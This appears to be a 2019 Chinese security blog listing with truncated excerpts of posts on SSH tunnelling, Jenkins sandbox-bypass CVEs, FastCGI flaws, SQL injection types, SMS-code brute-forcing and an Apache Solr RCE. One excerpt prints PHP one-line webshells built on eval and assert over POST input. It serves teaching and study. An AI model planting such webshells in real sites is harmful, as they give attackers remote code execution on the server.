2019年11月

Xshell是一个功能强大的终端模拟器,支持SSH,SFTP、TELNET、RLOGIN和SERIAL下载地址:http://www.netsarang.com/products/xsh_overview.html1、打开SSH连接属性窗口,选择隧道(下图已经添加成功一个)2、在xshell中执行持久命令避免ssh通道关闭执行 top 或者 vi 编辑文件3、SwitchySharp.......

内容描述脚本安全性插件中的沙箱绕过漏洞安全-1658 / CVE-2019-16538脚本安全插件中的沙盒保护可以通过闭包默认参数表达式来规避。这使攻击者能够在Jenkins主JVM的上下文中指定并运行沙盒脚本来执行任意代码。这些表达式现在受沙箱保护。支持核心插件,允许具有“整体/读取”权限的用户删除任意文件SECURITY-1634 / CVE-2019-16539(权限检查),C.......

漏洞原理FastcgiFastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。类比HTTP协议来说,fastcgi协议则.......

0x00 安装准备phpstudy https://www.xp.cn/phpstorm xdebug https://xdebug.org/0x01 配置过程1、安装好phpstudy后需要打印phpinfo()内容并且将phpinfo()的html源码放在,https://xdebug.org/wizard 这个地址里面的表单里。点击 Analyse my phpinfo().......

分类1.常见的sql注入按照参数类型可分为两种:数字型和字符型。当发生注入点的参数为整数时,比如 ID,num,page等,这种形式的就属于数字型注入漏洞。同样,当注入点是字符串时,则称为字符型注入,字符型注入需要引号来闭合。2.也可以根据数据库返回的结果,分为回显注入、报错注入、盲注。 回显注入:可以直接在存在注入点的当前页面中获取返回结果。报错注入:程序将数据库的返回错误信息直.......

PHP一句话后门一、常用执行代码函数1、eval():<?php @eval($_POST['hacker']); ?> eval函数将接受的字符串当做代码执行2、 assert():用法和 eval()一样<?php @assert($_POST['hacker']); ?> 3、preg_replace():<?php @preg_replace(&.......

1,短信验证码可爆破视频案例中输入手机号码、图片验证码就可以获取短信验证码,并且新密码也是在一个页面中,但是输入短信验证码之后,后端有个请求会判断短信验证码是否正确,错误的话页面会有提醒。攻击者可以用这个请求来爆破验证码,获取到正确的短信验证码之后就可以重置任意用户密码了。缺陷主要是两个方面,第一,未对短信验证码的失效时间进行限制;第二,功能设计存在缺陷,如果设计成整个功能只用最后一.......

引言20191031 网上爆出apache solr velocity模板注入的rce漏洞,该漏洞由国外安全研究员s00py公开,当solr默认插件VelocityResponseWrite中params.resource.loader.enabled参数值为true(默认false),再通过精心构造的get请求即可RCE。影响范围 apache solr 5.x - 8.2.0 r.......